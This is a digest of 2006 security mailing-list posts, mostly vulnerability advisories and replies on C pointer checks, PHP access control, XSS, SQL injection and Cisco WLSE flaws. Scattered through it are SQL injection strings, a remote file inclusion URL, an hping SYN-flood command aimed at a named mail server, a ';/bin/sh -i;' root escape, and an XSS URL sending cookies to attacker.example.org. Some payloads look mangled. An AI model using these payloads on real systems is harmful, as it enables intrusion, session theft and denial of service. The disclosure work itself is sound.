On Mon, 17 Apr 2006, Felix von Leitner wrote:

> I wrote a small library of functions to do typical range checks as they
> are needed in code that handles incoming packets or messages from
> untrusted sources.  My impetus was SMB code, in case you want to know.
>
> Here is one of my functions:
>
> static inline int range_ptrinbuf(const void* buf,unsigned long len,const void* ptr) {
>  register const char* c=(const char*)buf;  /* no pointer arithmetic on void* */
>  return (c && c+len>c && (const char*)ptr-c<len);
> }
>
> The "c+len>c" is the code with which you would
> typically check for integer overflows, which is a check that for example
> an IP stack would do, or Samba.  So, if you compiled your kernel with
> gcc 4.1, or your Samba, or some other packet handling code in a security
> relevant context, you might want to recompile with gcc 3.


Hi,

This is interesting.  But I am not sure that it is really a compiler bug. 
Rules for pointer arithmetic in C are rather restrictive, and stepping 
outside of them results in "undefined behavior".  I don't have the current 
ANSI C standard available, but even my old copy of K&R I says that you 
shouldn't compare pointers which point to different arrays, or you may get 
nonsense.  So I have a suspicion that this code may be illegal, and the 
different compiler versions just happen to have chosen different 
interpretations.


In fact, in some sense the new result is correct.  What if buf is an array 
of size 2^32?  Then buf + 0xU does in fact point to an element of 
buf beyond the 0th, so 'buf + 0xU > buf' is in that sense a true 
statement.  Of course, no existing x86 operating system is set up to work 
like that, but the compiler doesn't know that.


I guess a more general question is "if q is a pointer, and buf is an array 
of size n, how to tell if q points to an element of buf?"  You would like 
to be able to do


q >= buf && q < buf+n

but I think maybe this is not right.  In fact, on a machine with very 
crazy memory management, it might be very difficult or impossible to 
answer that question.


I guess the correct test is not to try to apply the test to the pointer 
but to the index.  E.g. if given an untrusted index i, rather than letting 
q=buf+i and then trying to validate q, just remember the value for i and 
check whether i >= 0 && i <= n.  That seems foolproof to me.


You might want to bring this up on a forum like comp.lang.c where people 
know a lot about the C language.  Alternatively, if you've already 
reported this as a bug to the gcc maintainers (which of course you would 
do before posting to bugtraq, right? :), they will probably be able to 
explain what's going on.


In any case, it's useful to know about this, if nothing else so that 
people know to avoid code like that.  Thanks for bringing it up.


--
Nate Eldredge
[EMAIL PROTECTED]
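A worked version of the index-first check the reply above recommends, written in C for this digest. It is an added example, not code from the thread or from any project mentioned in it; the function names (`index_in_bounds`, `read_element`, `lookup_sample`) and the four-byte sample buffer are made up for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Added example (not code from the thread): validate the untrusted *index*
 * and only then form a pointer.  Computing buf + i for an i outside
 * [0, n] is undefined behaviour in C, so a check written as
 * `q >= buf && q < buf + n` may be treated by the compiler as always
 * true and dropped.  Integer comparisons are always well defined and
 * cannot be optimised away, which is the point of the thread's suggestion.
 */

/* Valid element indices are 0 .. n-1; the cast is safe because i has
 * already been shown to be non-negative. */
int index_in_bounds(size_t n, long i)
{
    if (i < 0)
        return 0;
    return (unsigned long)i < n;
}

/* Fetch buf[i] only after the index has been validated.
 * Returns the byte value (0..255), or -1 when i is out of range. */
int read_element(const unsigned char *buf, size_t n, long i)
{
    if (!index_in_bounds(n, i))
        return -1;
    return buf[i];
}

/* Constructed sample buffer standing in for a received packet. */
static const unsigned char sample[4] = { 0x10, 0x20, 0x30, 0x40 };

/* Hypothetical lookup driven by an attacker-controlled index. */
int lookup_sample(long i)
{
    return read_element(sample, sizeof sample, i);
}

int main(void)
{
    /* Probes: in range, last valid, one past the end, negative, huge. */
    long probes[] = { 0, 3, 4, -1, 0x7fffffffL };
    size_t k;
    for (k = 0; k < sizeof probes / sizeof probes[0]; k++)
        printf("index %ld -> %d\n", probes[k], lookup_sample(probes[k]));
    return 0;
}
```

Note that the comparison is `< n`, not `<= n`: index n is one past the end and may be computed as a pointer but never dereferenced.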


Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread somebody
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead 
of .com

That should fix it, until the next update cycle.


RE: redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Evans, Arian
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/functions behind the entrypoint).

2. Tools already exist that allow you to manually ignore
redirects per your question below, and some do this automatically.
www.owasp.org and www.webappsec.org are good places to start.

3. This said, "how secure?" in this case is a math problem.
Given you know the directory structure, if all you are doing
is trying to brute-force enumerate the file name, then all
you have is a fuzzing problem plus HTTP requests/sec rate
(that is realistic to achieve).

If your admin default page is "supersexysecretsignon.php"
I can turn a fuzzer loose on this until I get an HTTP 200 OK,
or a change in body content, and automatically flag the page.

In the case above, I have 21 characters to fuzz plus a
page extension, so (21^27 * [$.extensions]) to work through.

I could fuzz *everything* or be lazy and fuzz a variable
and tack on a list of say 10 well-known extensions to each
iteration of the variable.

Assuming I do not know the page name, let's take 50 chars
ASCII/numeric, assume it is case-sensitive on *nix, so you
would have 50^64 possible combinations starting at "a".
Then multiply that times the number of extensions you want
to try, unless you want to fuzz those characters too.

How fast you could work through that keyspace is a good
question. I recommend you Google for Mike Shema's work
on session token entropy from RSA '05 and later, and
he has excellent tables on 'n' HTTP/req/sec = $work_time
to exhaust a given keyspace, which is exactly what you
are essentially asking here I believe.

Excellent questions, again. Two good mailing lists to ask
these sorts of questions on are:

[EMAIL PROTECTED]
[EMAIL PROTECTED]

Double-check my math. I haven't had my coffee today, adding
to my native processor's already unfortunate tendency to
introduce random floating-point error into my ad-hoc calculations.

Arian J. Evans
FishNet Security

Note: Microsoft Office breaks text-based emails by default.
To see text messages properly formatted, turn off:
Tools>Options>|Email Options|+Remove Extra Line Breaks

816.421.6611 [fns office]
816.701.2045 [direct]
888.732.9406 [fns toll-free]
816.421.6677 [fns general fax]
913.710.7085 [mobile] <--best bet
[EMAIL PROTECTED] [email]

http://www.fishnetsecurity.com



> -Original Message-
> From: Ivan Sergio Borgonovo [mailto:[EMAIL PROTECTED] 
> Sent: Saturday, April 15, 2006 7:47 AM
> To: bugtraq@securityfocus.com
> Subject: redirection vuln crawlers breed & security through obscurity
> 
> 
> I just came across such kind of code (php) written by a colleague:
> 
> //header.inc
> if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
>   header("Location: ./login.html");
> //missing else to mitigate the problem!!
> //HTML stuff here...
> 
> code structure of all the other "supposed to be" private pages is:
> 
> //wannabeprotected.php
> include_once("include/header.inc")
> //wannabe protected code
> 
> Everything resides at something like:
> http://site/admin/
> 
> of course the ONLY thing you've to do to break into the admin 
> interface is:
> - disable redirection in your preferred browser (w3m)
> - guess the right address and
> - point exactly to it: http://site/admin/index.php or any 
> existing page[1] eg. http://site/admin/killingmesoftly.php
> 
> http://site/admin/ won't work. I did some research to see if 
> you could find a way to make "educated guess" by examining 
> the flow of HTTP responses, but I didn't come out with any 
> good idea. Nevertheless index.php doesn't seem to be a bad 
> educated guess (as Default.asp, index.asp, index.pl, login.asp...).
> 
> Now some questions and a proposal:
> - how safe is it to rely on secrecy of the URL? I'm looking for 
> a quantification of the risk, not a "it is a bad idea" ;)
>  of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is 
> safer than http://site/admin/index.php. Any already made 
> study? numbers?
> - are SE like google going to index such kind of pages if 
> there is no "external" link[*]?
> - are there already many specialized vuln crawlers looking 
> for such kind of URLs?
> 
> What about building crawlers that ignore redirection to scan 
> for such kind of vulns?
> I think that kind of mistake should be pretty popular.
> 
> Did I reinvent the wheel?
> 
> [1] this makes educated guessing easier increasing the number 
> of potential targets: manager.php, insert.php, delete.php and 
> it makes this [in]security model rely just on the dir path... 
> unless the programmer is so crazy to call all his files with 
> random names. But coding the access credential in a path 
> makes the code not that relocatable... etc... etc..
> 
> [*] What I mean: there exists a chain of links that conn

Tlen.PL e-mail XSS vulnerability.

2006-04-19 Thread koper
As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt

::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <[EMAIL PROTECTED]>
::URL: http://security.pass.pl



::1::Overview::
The Tlen.PL e-mail system is affected by a cross-site scripting vulnerability: it does 
not validate HTML tags in the e-mail message subject. 



::2::Description::
Tlen.PL is a popular Polish IM system provided by o2.pl, which includes e-mail 
accounts, and an e-mail client built into the 
communicator software (under Windows it is actually an instance of Internet 
Explorer, displaying the webmail system). 
Depending on the server 'assigned' to the account (varying probably by the date 
of registration), the webmail client does 
not validate the e-mail subject for HTML tags, allowing an attacker to inject script 
code.
The vulnerable server is accessed by default with the Tlen.pl IM client (by older 
accounts).
The vulnerable server does not provide webmail services through default web 
browser access
(using for ex.:  http://poczta.o2.pl, http://mail.tlen.pl), yet it is still 
accessible under http://beta.mini.tlen.pl 
and used inside the Tlen.pl IM client.
On the account tested (login: koper, served by beta.mini.tlen.pl, 193.17.41.32, 
registered over 5 years ago), the length of the 
subject displayed is 28 characters, which is the length an attacker can use to 
inject HTML.



::3::Impact::
An attacker could include some of this code inside the subject field of e-mail 
sent to the target account:

http://pass.pl"; 

//(28 chars, no HTML ending bracket, still http://pass.pl page is displayed 
inside ,
//giving an attacker the ability to include more code. Having shorter domain 
name allows an
//attacker to give valid  tag.


alert("xx") 

//Displays 2 chars alert window  

etc.



::4::Solution::
None provided, Vendor contacted on 16 Feb 2006.



::6::Systems affected::
All Tlen.pl Communicator versions, but not all accounts affected.
Servers checked to be vulnerable: beta.mini.tlen.pl [ 193.17.41.32 ].
Servers checked NOT to be vulnerable: mini10.tlen.pl [ 193.17.41.92 ].


Re: Multiple Vulnerabilities in LucidCMS

2006-04-19 Thread zachofalltrades
these vulnerabilities are dealt with for the next release candidate (RC6)


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread no . spam
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are 
actually still using Windows for anything other than playing games)

You just add an entry in your DNS server with a zone matching the hostname that 
you want to override. And if they have the IP addresses of MSFT-controlled DNS 
servers hardcoded, you just add an iptables (or equivalent) entry in your 
firewall (note - this is a separate device from your wintendo PC, not a piece 
of software running on your PC)


Fortinet28 box does not resist a small synflood!

2006-04-19 Thread testx444
Fortinet28 box does not resist a small synflood on smtp port!
ips protection is not effective because there is not enough syn!
hping -i u10 -p 25 -S mail.fortinet.com





ContentBoxx Login.php Cross-Site Scripting

2006-04-19 Thread botan
Website : http://www.contentboxx.info/en/
Author : Botan

Description:

Web Content Management 

ContentBoxX is a professional software upon which the production of editorial 
systems, used in the maintenance of Internet and Intranet offers, is based. 
ContentBoxX is suited for use in demanding Web sites. And, because of its open 
architecture, is up to even the most complex challenges.

Vulnerable :

http://www.site.com/cms/login.php?action=XSS


WWWThread RC 3 MultBugs

2006-04-19 Thread o . y . 6
[code]// --- WWWThread RC 3 MultBugs --- //

* D3vil-0x1 | Devil-00
* www.securitygurus.net
* Gr33tz
- HACKERS PAL | n0m3rcy | -

&
All Others << i forgot them :))

//-//

//-// [ Bug 1 ] 
//-//

// File name :- register.php
// Bug :- Remote [ $_COOKIE['forumreferrer'] ] SQL Injection

/* Code
//
if(isset($_COOKIE["forumreferrer"]))
{
    $referral_id = $_COOKIE["forumreferrer"];
    $result = $db->query('SELECT referral_count FROM '.$db->prefix.'users WHERE id='.$referral_id)
        or error(mysql_error(), __FILE__, __LINE__, $db->error());
    list($referral_val) = $db->fetch_row($result);
    $rval = $referral_val[0] + 1;
    $db->query('UPDATE '.$db->prefix.'users SET referral_count='.$rval.' WHERE id='.$referral_id)
        or error(mysql_error(), __FILE__, __LINE__, $db->error());
}
//
*/

Fix :-

/*
$referral_id = intval($_COOKIE["forumreferrer"]);
*/


//-// //-// 
//-// //-// 
//-// //-// 
//-// //-//

//-//  [ Bug 2 ] 
//-//

// File name :- message_list.php
// Bug :- Remote SQL Injection

/* Code

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) )
{
    if( isset($_POST['delete_messages_comply']) )
    {
        confirm_referrer('message_list.php');
        $db->query('DELETE FROM '.$db->prefix.'messages WHERE id IN('.$_POST['messages'].') AND owner=\''.$forum_user['id'].'\'')
            or error(mysql_error(), __FILE__, __LINE__, $db->error());
        redirect('message_list.php?box='.$_POST['box'], $lang_pms['Deleted redirect']);
    }

*/

// Fix :-

Replace with this code :D

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) )
{
    if( isset($_POST['delete_messages_comply']) )
    {
        confirm_referrer('message_list.php');
        $db->query('DELETE FROM '.$db->prefix.'messages WHERE id IN('.intval($_POST['messages']).') AND owner=\''.$forum_user['id'].'\'')
            or error(mysql_error(), __FILE__, __LINE__, $db->error());
        redirect('message_list.php?box='.$_POST['box'], $lang_pms['Deleted redirect']);
    }
}

// Exploit

- Resend this request with HTTPLiveHeaders :D -

messages=[SQL]&box=0&delete_messages_comply=Delete
[/code]


Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread john
The XP DNS client has other problems as well.  It caches DNS failures 
(arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into 
an internet network that has local domains which need to resolve to RFC1918 
addresses.  The cached failed lookups get preferred to forced entries in the 
hosts file, if that is tried as a way of forcing the dns lookups to work.  Very 
frustrating.  So, this isn't much of a surprise.  Rotten, yes, surprising, no.


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread robsekeris
After reading your scary message, I went to verify your points and confirmed all. 
Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal 
Firewall is for free) on top of a router firewall, I've been able to block or 
force a request as I see fit for each of these sites. On WMP, untick the 
Automatic Coded update function for starters, but indeed it's highly irritating 
that you have no control over auto update yes/no. As to the MS firewall, that's 
a joke. It only does partial incoming traffic control and NONE on outgoing! 
If you like blocking specific IPs or ranges use for instance Peerguardian 2. I 
find it stops truly anything you don't want to come through.

The bypassing of the HOSTS file is something I think would fall under required 
disclosure: changing functionality of an integral part of network control. 
I think this built-in trickery will be of interest to the EU commission too!


Shbablek Mail Vulnerability - Cross-Site Scripting

2006-04-19 Thread n0m3rcy
# Shbablek Mail Vulnerability - Cross-Site Scripting
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <[EMAIL PROTECTED]>
# Exploit:

i) in the Already have an account?
ia) Account name: alert(1)
ib) Password: alert(1)

# Shoutz:
cijfer , dag , devil-00 , q-ex and all my friends

# have phun!


redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Ivan Sergio Borgonovo
I just came across such kind of code (php) written by a colleague:

//header.inc
if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...

code structure of all the other "supposed to be" private pages is:

//wannabeprotected.php
include_once("include/header.inc");
//wannabe protected code

Everything resides at something like:
http://site/admin/

of course the ONLY thing you've to do to break into the admin interface is:
- disable redirection in your preferred browser (w3m)
- guess the right address and
- point exactly to it: http://site/admin/index.php or any existing page[1] eg. 
http://site/admin/killingmesoftly.php

http://site/admin/ won't work. I did some research to see if you could find a 
way to make an "educated guess" by examining the flow of HTTP responses, but I 
didn't come out with any good idea. Nevertheless index.php doesn't seem to be a 
bad educated guess (as Default.asp, index.asp, index.pl, login.asp...).

Now some questions and a proposal:
- how safe is it to rely on secrecy of the URL? I'm looking for a quantification 
of the risk, not a "it is a bad idea" ;)
 of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is safer than 
http://site/admin/index.php. Any already made study? numbers?
- are SE like google going to index such kind of pages if there is no 
"external" link[*]?
- are there already many specialized vuln crawlers looking for such kind of 
URLs?

What about building crawlers that ignore redirection to scan for such kind of 
vulns?
I think that kind of mistake should be pretty popular.

Did I reinvent the wheel?

[1] this makes educated guessing easier, increasing the number of potential 
targets: manager.php, insert.php, delete.php and it makes this [in]security 
model rely just on the dir path... unless the programmer is so crazy as to call 
all his files with random names. But coding the access credential in a path 
makes the code not that relocatable... etc... etc..

[*] What I mean: there exists a chain of links that connects that page with a link 
on a homepage or an already indexed page.

BTW the colleague didn't set any association between .inc and the php 
interpreter. So you can even get the header.inc source with another, maybe 
harder, educated guess.

... and happy Easter holidays.

-- 
Ivan Sergio Borgonovo
http://www.webthatworks.it


Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread Paul Wouters

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:

> It's a simple method to bypass malicious host file modification.  Probably
> in response to malware like MyDoom, which specifically altered the hosts
> file to keep clients from accessing AV sites ( go.microsoft.com was also
> specifically included in MyDoom as well.)


Sure. And instead of everyone whining about this, they should prepare
their DNSSEC setup so microsoft can secure their zone and can rely on
the resolver to use DNSSEC to prevent these types of malware traps.

Paul


Re: phpBB Admin command execution

2006-04-19 Thread dave . de
On which version of phpBB was this tested?


Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in the WLSE
Appliance

Advisory ID: cisco-sa-20060419-wlse

http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

There are two vulnerabilities that exist in the CiscoWorks Wireless
LAN Solution Engine (WLSE). The first is a cross site scripting (XSS)
vulnerability that may allow an attacker to gain administrative
privileges on the system. The second is a local privilege escalation
vulnerability that can be used by an attacker who already has
authenticated access to the command line interface to obtain access
to the underlying operating system.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Affected Products
=

Vulnerable Products
+--

A CiscoWorks Wireless LAN Solution Engine (WLSE) or WLSE Express
running any version of software prior to 2.13 is vulnerable to both
of these vulnerabilities.

Several other Cisco products are affected only by the local privilege
escalation vulnerability, including Cisco Hosting Solution Engine
(HSE), User Registration Tool (URT), Cisco Ethernet Subscriber
Solution Engine (ESSE) and CiscoWorks2000 Service Management
Solution. A separate Cisco Security Response has been published
regarding the impact and the fixes on these products and can be found
at http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Products Confirmed Not Vulnerable
+

No other Cisco products are affected by both of these
vulnerabilities.

Details
===

CiscoWorks WLSE is a centralized, systems-level application for
managing and controlling an entire autonomous Cisco WLAN
infrastructure.

Two vulnerabilities exist in the WLSE appliance that may allow an
attacker to gain complete control of the device or to obtain access
to the underlying operating system.

These issues are documented by the following Cisco bug IDs:

  * CSCsc01095 (registered customers only) - Cross site scripting
vulnerability in WLSE appliance web interface
This fix addresses the cross site scripting (XSS) vulnerability
in the WLSE appliance web user interface. By exploiting this
vulnerability, an attacker may obtain the session cookie
information and further use this information to gain
administrative privileges on the system.
  * CSCsd21502 (registered customers only) - Privilege escalation to
Linux shell
This fix addresses the local privilege escalation from the
command line interface of the WLSE appliance. By exploiting this
vulnerability an attacker who already has authenticated access to
the command line interface may inject a command to obtain a shell
account on the underlying operating system.

Impact
==

By exploiting these vulnerabilities together, an attacker may obtain
complete control of the WLSE appliance.

Software Version and Fixes
==

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

These vulnerabilities are fixed in the 2.13 version of WLSE software.
Fixed software can be downloaded from the following URL:

http://www.cisco.com/cgi-bin/tablebuild.pl/wlan-sol-eng

Workarounds
===

There are no workarounds for these vulnerabilities.

Obtaining Fixed Software
========================

Cisco will make free software available to address this vulnerability
for affected customers. This advisory will be updated as fixed
software becomes available. Prior to deploying software, customers
should consult their maintenance provider or check the software for
feature set compatibility and known issues specific to their
environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree t

ThWboard <= 3 Beta 2.84 SQL Injection

2006-04-19 Thread Qex
 
Discovered by: Qex 
Date: 19 April 2006 
 

/showtopic.php?threadid=1&pagenum=[SQL]


RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities

2006-04-19 Thread info

------------------------------------------------------------------------
- GroundZero Security Research and Software Development 2006           -
------------------------------------------------------------------------
-                                                                      -
-  Security Advisory regarding RechnungsZentrale v2.                   -
-  SQL Injection and Remote File inclusion Vulnerabilities.            -
-  Released: Tue Apr 18 18:00:00 CEST 2006                             -
-                                                                      -
------------------------------------------------------------------------




------------------------------------------------------------------------
- Affected:                                                            -
------------------------------------------------------------------------

Software:   RechnungsZentrale V2
Version:    1.1.3, likely older versions are affected as well.
Vendor: http://www.nfec.de/



------------------------------------------------------------------------
- Information:                                                         -
------------------------------------------------------------------------

"RechnungsZentrale V2 is a multiuser, Web-based billing application. 
 It facilitates the creation of bills and the management of customers. 
 It is written in PHP and uses MySQL. It supports German, English, French, 
 and Dansk languages."

The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.

The SQL injection vulnerability exists in the login script (authent.php4) and 
allows an Attacker to log into the internal Interface or execute malicious 
SQL commands.

PoC:
User: ' OR '1'='1
Password: 1


In the same script it is possible to include a remote php by pointing the 
"rootpath=" option to a remote PHP script with a system() or passthru() 
function.
   
Doing so would allow an unauthenticated Attacker to execute shell commands 
with 
permissions of the Web Server. 

PoC: 

http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4



------------------------------------------------------------------------
- Vendor Response:                                                     -
------------------------------------------------------------------------

Notified:   Tue Apr 18 16:12:14 CEST 2006
Response:   Tue Apr 18 17:13:14 CEST 2006 
(Development Discontinued)
Disclosure: Tue Apr 18 18:00:00 CEST 2006



------------------------------------------------------------------------
- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org              -
------------------------------------------------------------------------


Multiple vulnerabilities in Linux based Cisco products

2006-04-19 Thread assurance.com.au
Assurance.com.au - Vulnerability Advisory
---
Release Date:
 19-Apr-2006

Software:
 Cisco Wireless Lan Solution Engine (WLSE)
 Cisco Hosting Solution Engine (HSE)
 Cisco Ethernet Subscriber Solution Engine (ESSE) 
 Cisco User Registration Tool (URT)
 CiscoWorks2000 Service Management Solution (SMS) 
 Cisco Vlan Policy Server (VPS)
 Cisco Management Engine (ME1100 Series)
 CiscoWorks Service Level Manager (SLM)


Vulnerabilities discovered:

 (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
 execution of arbitrary code as the root user. 

 (2) Cross-site scripting flaw allows session theft

Vulnerability impact of each:

 (1) Medium - An authenticated user can gain root access to the Linux based 
  system

 (2) Low - A targeted attack could lead to session theft and administrator
   compromise

Vulnerability information

 (1) The Cisco shell presents the administrator with a restricted set of 
 commands which includes a "show" application. The "show" application has
 several vulnerabilities which allow an attacker to "break out" of the 
 shell and execute commands (including /bin/sh) as the root user.

 This "show" application has been in use on this Linux-based platform 
 build since 1999 and exists on several other Linux-based Cisco products.

 Example:
  An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  [EMAIL PROTECTED]: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp ([EMAIL PROTECTED]) (gcc version 2.96 2731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.

  [EMAIL PROTECTED]: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

  At this point the administrator has root level access to the Linux-based
  Cisco device.

 (2) A cross-site scripting flaw exists in:
  /wlse/configure/archive/archiveApplyDisplay.jsp
with the "displayMsg" parameter. This can be used to steal the JSP session
cookie, therefore giving a targeted attacker admin level access to the 
system.  Once the attacker has admin web GUI access to the system via the 
XSS, they can then change the admin password or create a new admin user 
(without requiring the admin password).

The attacker can then use the aforementioned "show cli" local root 
vulnerability to gain complete control of the Cisco Linux-Based system.

As with (1) above Telnet or SSH access is required to login with the 
newly created user with admin level access in order to exploit the 
"show cli" bug.

  Example:
   http://cisco-wlse.example.org/wlse/configure/archive/ \
   archiveApplyDisplay.jsp?displayMsg=document.location='http:// \
   attacker.example.org?'+document.cookie
 
  The cookie posted to attacker.example.org includes the JSESSIONID token:
   ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \
   HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689

  When combined with vulnerability (1), it allows a targeted attacker to gain
  root access to the linux system.  

Solution:
 Cisco has released patches for the vulnerabilities.

References:
 Assurance.com.au advisory
 http://www.assurance.com.au/advisories/200604-cisco.txt

 Cisco advisory note:
 http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
 
 Cisco security response:
 http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Credit:
 Adam Pointon of Assurance.com.au
 http://www.assurance.com.au/

Disclosure timeline:
 30-Dec-2005 - Discovered during configuration for a customer
 29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
 31-Jan-2006 - Response received from Cisco psirt
 01-Feb-2006 - Cisco advises bug reports have been opened for both issues
 05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
 19-Apr-2006 - Advisory released

About us:
Assurance.com.au is a specialised information security consultancy. 
Our mission is to help organisations identify and secure information 
assets. Our expertise concentrates in security architecture, managed 
security and professional services in security testing/review and 
compliance. 

Supporting this approach are services in the following areas: 

* Compliance Services - Penetration testing, security reviews, 
compliance and audit services 

* Wireless and mobility solutions - design, installation and 
management of IEEE 802.11a/b/g (WiFi), tele-mobility and other 
wireless solutions 

* UNIX-like systems, netw
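The root cause behind vulnerability (1) above, a restricted-shell `show` command that hands its argument to a real shell, is clearest next to the safe pattern. What follows is an added example for this digest, not Cisco's code or Assurance.com.au's: a constructed syslog excerpt, an `include` filter done entirely in-process so the argument is never interpreted by a shell, and, for the case where an external tool really is needed, a fork/exec helper that passes arguments as an argv array so `;` and similar characters stay literal. The function names and the log lines are made up.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Constructed syslog excerpt standing in for /var/log/messages. */
static const char sample_log[] =
    "Apr 19 10:01:02 wlse sshd[412]: Accepted password for admin from 10.0.0.5\n"
    "Apr 19 10:01:09 wlse kernel: eth0: link up\n"
    "Apr 19 10:02:30 wlse sshd[413]: Failed password for root from 10.0.0.9\n"
    "Apr 19 10:03:00 wlse cron[99]: (root) CMD (run-parts /etc/cron.hourly)\n";

/*
 * `show syslog include <needle>` implemented in-process.  The filter
 * argument is only ever a byte string handed to strstr(), so ';', '|',
 * '`' and friends have no special meaning.  Matching lines are written to
 * out (may be NULL); the number of matching lines is returned.
 */
int filter_log_include(const char *log, const char *needle, FILE *out)
{
    int matches = 0;
    const char *line = log;

    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t full = nl ? (size_t)(nl - line) : strlen(line);

        /* Bounded copy so the line can be NUL-terminated for strstr(). */
        char buf[512];
        size_t len = full < sizeof buf - 1 ? full : sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        if (*needle == '\0' || strstr(buf, needle) != NULL) {
            matches++;
            if (out != NULL)
                fprintf(out, "%s\n", buf);
        }
        line += full;
        if (nl != NULL)
            line++;             /* skip the newline */
    }
    return matches;
}

/*
 * When an external tool is unavoidable, never build a command string for
 * system() or popen().  fork/execvp with an argv array delivers every
 * argument to the program unchanged, so a needle of ";/bin/sh -i;" reaches
 * grep as one literal pattern and no shell is involved at all.
 * Returns the child's exit status, or -1 on failure.
 */
int run_without_shell(char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);             /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The hostile argument from the advisory: in-process it matches nothing. */
    int n = filter_log_include(sample_log, ";/bin/sh -i;", stdout);
    printf("hostile needle matched %d lines\n", n);

    /* An ordinary query. */
    n = filter_log_include(sample_log, "sshd", stdout);
    printf("\"sshd\" matched %d lines\n", n);

    /* External-tool variant: grep -F treats the needle as a fixed string,
     * and "--" stops a needle beginning with '-' from being read as an option. */
    char *argv[] = { "grep", "-F", "-c", "--", "sshd", "/dev/null", NULL };
    printf("grep exit status: %d\n", run_without_shell(argv));
    return 0;
}
```

The in-process filter is the preferable fix for a restricted CLI: there is no external process to escape from. The argv helper is the fallback when the tool must be external; the point is that the argument list is a vector, never a string that a shell re-parses.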

[security bulletin] HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote Execution of Arbitrary Code

2006-04-19 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00629555
Version: 7

HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-04-17
Last Updated: 2006-04-18

